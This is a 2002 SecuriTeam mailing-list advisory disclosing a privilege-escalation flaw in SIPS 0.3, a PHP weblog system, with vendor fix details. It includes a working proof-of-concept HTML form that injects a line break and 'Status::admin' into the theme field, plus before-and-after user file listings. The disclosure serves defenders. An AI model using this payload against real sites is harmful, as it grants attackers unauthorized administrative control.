[UNIX] SIPS Allows Attackers to Gain Administrative Access
From: support@securiteam.comDate: 02/15/02
- Previous message: support@securiteam.com: "[NT] Identix's BioLogon 3 Can be Easily Bypassed"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 15 Feb 2002 22:59:31 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
SIPS Allows Attackers to Gain Administrative Access
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/sips/> SIPS (Simple Internet Publishing
System) is an integrated Weblog and link-indexing system written in PHP.
It is aimed at those with access to database-less, PHP-enabled Web servers
who want to run a Weblog site like Slashdot and/or a simple link index
like Yahoo!. A security vulnerability in the product allows attackers to
gain elevated privileges.
DETAILS
Vulnerable systems:
SIPS version 0.3 and prior
Immune systems:
SIPS version 0.3.1
The problem allows users that select a theme, to use it modify their value
Status. Changing the Status value to admin in the database allows gaining
of arbitrary privileges. This can be accomplished by adding a line break
and writing "Status::admin" in the next line. This will cause the user to
be recognized as an administrator giving him complete control over the
site.
Example:
<form action="http://www.example.com/sips/htdocs/preferences.php"
method="post">
<input type="hidden" name="op" value="theme">
<input type="hidden" name="action" value="settheme">
<select name="themename">
<option value="default
Status::admin
">Exploited</option>
</select>
<input type="submit" value="Set Theme"></form>
Here we submit a theme with the value of:
Default -line break
Status::admin -line break (SIPS chops the theme input).
This will change an account from something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@example.com
Theme::default
Timezone::Greenwich Mean
To something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@example.com
Timezone::Greenwich Mean
Theme::default
Status::admin
The Status::admin allows you to use:
http://www.example.com/sips/htdocs/admin/index.php, which will give you
total control over SIPS (pretty much the whole site).
Vendor status:
The author was contacted on 2/1/02 and replied the same day. Author
updated to version 0.3.1 on 2/8/02 and wrote a very nice page detailing
the problem and possible solutions:
<http://sips.sourceforge.net/adminvul.html>
http://sips.sourceforge.net/adminvul.html
ADDITIONAL INFORMATION
The information has been provided by <mailto:b0iler@hotmail.com> b0iler
_.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Identix's BioLogon 3 Can be Easily Bypassed"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
